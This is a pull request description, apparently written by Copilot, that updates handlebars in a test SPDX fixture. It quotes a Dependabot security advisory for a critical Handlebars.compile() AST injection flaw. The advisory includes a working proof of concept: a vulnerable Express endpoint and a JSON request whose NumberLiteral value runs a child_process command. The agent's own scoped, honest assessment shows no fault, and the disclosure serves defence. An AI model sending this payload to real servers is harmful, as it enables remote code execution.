Update handlebars to 4.7.9 in test SPDX fixture to resolve CVE-2026-33937

[Copilot]

Dependabot flags handlebars@4.4.3 listed in test/manifest.spdx.json (GHSA-2w6w-674q-4c4q). This is a test fixture SPDX document, not an actual dependency.

• Updated versionInfo and referenceLocator from 4.4.3 → 4.7.9 in the SPDX package entry

Reachability Assessment

Not reachable (high confidence). handlebars is not in package.json or package-lock.json. No code imports or calls Handlebars.compile(). The package appears solely as an inventory entry in a test SPDX manifest used to exercise the SBOM parser. This update satisfies the vulnerability scanner only.

Original prompt

---

This section details the Dependabot vulnerability alert you should resolve

<alert_title>Handlebars.js has JavaScript Injection via AST Type Confusion</alert_title>
<alert_description>## Summary

Handlebars.compile() accepts a pre-parsed AST object in addition to a template string. The value field of a NumberLiteral AST node is emitted directly into the generated JavaScript without quoting or sanitization. An attacker who can supply a crafted AST to compile() can therefore inject and execute arbitrary JavaScript, leading to Remote Code Execution on the server.

Description

Handlebars.compile() accepts either a template string or a pre-parsed AST. When an AST is supplied, the JavaScript code generator in lib/handlebars/compiler/javascript-compiler.js emits NumberLiteral values verbatim:

// Simplified representation of the vulnerable code path:
// NumberLiteral.value is appended to the generated code without escaping
compiledCode += numberLiteralNode.value;

Because the value is not wrapped in quotes or otherwise sanitized, passing a string such as {},{})) + process.getBuiltinModule('child_process').execFileSync('id').toString() // as the value of a NumberLiteral causes the generated eval-ed code to break out of its intended context and execute arbitrary commands.

Any endpoint that deserializes user-controlled JSON and passes the result directly to Handlebars.compile() is exploitable.

Proof of Concept

Server-side Express application that passes req.body.text to Handlebars.compile():

import express from "express";
import Handlebars from "handlebars";

const app = express();
app.use(express.json());

app.post("/api/render", (req, res) => {
  let text = req.body.text;
  let template = Handlebars.compile(text);
  let result = template();
  res.send(result);
});

app.listen(2123);

POST /api/render HTTP/1.1
Content-Type: application/json
Host: 127.0.0.1:2123

{
  "text": {
    "type": "Program",
    "body": [
      {
        "type": "MustacheStatement",
        "path": {
          "type": "PathExpression",
          "data": false,
          "depth": 0,
          "parts": ["lookup"],
          "original": "lookup",
          "loc": null
        },
        "params": [
          {
            "type": "PathExpression",
            "data": false,
            "depth": 0,
            "parts": [],
            "original": "this",
            "loc": null
          },
          {
            "type": "NumberLiteral",
            "value": "{},{})) + process.getBuiltinModule('child_process').execFileSync('id').toString() //",
            "original": 1,
            "loc": null
          }
        ],
        "escaped": true,
        "strip": { "open": false, "close": false },
        "loc": null
      }
    ]
  }
}

The response body will contain the output of the id command executed on the server.

Workarounds

• Validate input type before calling Handlebars.compile(): ensure the argument is always a string, never a plain object or JSON-deserialized value.

  if (typeof templateInput !== 'string') {
    throw new TypeError('Template must be a string');
  }

• Use the Handlebars runtime-only build (handlebars/runtime) on the server if templates are pre-compiled at build time; compile() will be unavailable.</alert_description>

critical
GHSA-2w6w-674q-4c4q, CVE-2026-33937
handlebars
npm
<vulnerable_versions>= 4.4.3</vulnerable_versions>
<patched_version>4.7.9</patched_version>
<manifest_path>test/manifest.spdx.json</manifest_path>

https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2w6w-674q-4c4q https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2 https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9 https://nvd.nist.gov/vuln/detail/CVE-2026-33937 https://github.com/advisories/GHSA-2w6w-674q-4c4q

<task_instructions>Resolve this alert by updating the affected package to a non-vulnerable version. Prefer the lowest non-vulnerable version (see the patched_version field above) over the latest to minimize breaking changes. Include a Reachability Assessment section in the PR description. Review the alert_description field to understand which APIs, features, or configurations are affected, then search the codebase for usage of those specific items. If the vulnerable code path is reachable, explain how (which files, APIs, or call sites use the affected functionality) and note that the codebase is actively exposed to this vulnerability. If the vulnerable code path is not reachable, explain why (e.g. the affected API is never called, the vulnerable configuration is not used) and note that the update is primarily to satisfy vulnerability scanners rather ...

• Resolves advanced-security/spdx-dependency-submission-action alert #380